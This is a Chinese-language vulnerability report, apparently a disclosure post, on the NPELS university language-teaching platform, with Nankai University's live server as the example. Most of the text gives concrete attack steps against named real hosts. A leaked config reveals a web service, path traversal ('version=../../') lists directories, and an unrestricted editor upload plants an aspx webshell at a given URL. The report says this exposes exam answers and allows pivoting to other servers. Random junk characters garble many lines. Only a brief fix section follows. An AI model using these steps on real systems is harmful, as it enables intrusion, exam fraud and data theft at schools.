新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中
5 \+ C+ z5 P! ]: y1 n3 C
详细说明：

% o& x4 ^+ h9 `- [5 Y' q$ O: l/ n以南开大学的为例:
http://222.30.60.3/NPELS
- a% h' |& G* T: ?: |2 t9 hNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
* @( k7 [9 i0 G5 S<setting name="Update_CommonSvr_CommonService" serializeAs="String">
% [& Z5 R$ C+ `( M. J<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
</setting>
及版本号
: T: d  N" C" I4 @2 A<add key="TVersion" value="1, 0, 0, 2187">
2 p# @& ]- {1 h5 K! k</add>
直接访问
http://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作，直接 HTTP GET 列目录：
4 z6 a2 n6 c7 Hhttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
http://222.30.60.3/NPELS/CommonS ... List?version=../../
9 V, D0 n* s( x$ e# v5 s# I8 `
发现
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
7 b$ V5 p* D0 w5 B8 n  h可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
6 R) @) T% x8 _, |( P+ I; F9 k& e+ C上传后继续列目录找到木马地址直接访问即可

0 l9 O$ B- z; J( fOOXX
; \4 W+ T4 H. [  S/ K# `
Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
漏洞证明：
9 g; U1 m9 E8 `6 z* B0 z' ^1 ]+ Y
列目录：
http://222.30.60.3/NPELS/CommonS ... List?version=../../
3 }  b( A' w5 g2 Q7 x& C0 d& p文件上传：
) f3 ?; \0 s: o/ l! Y, ehttp://222.30.60.3/npelsv/editor/editor.htm

上传木马：
4 C2 U' t7 K. v. P* D; Ehttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

修复方案：
好像考试系统必须使用 CommonService.asmx
( s0 j! b8 e1 Y) w% V9 l最好配置文件加密或者用别的方式不让它泄露出来
并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​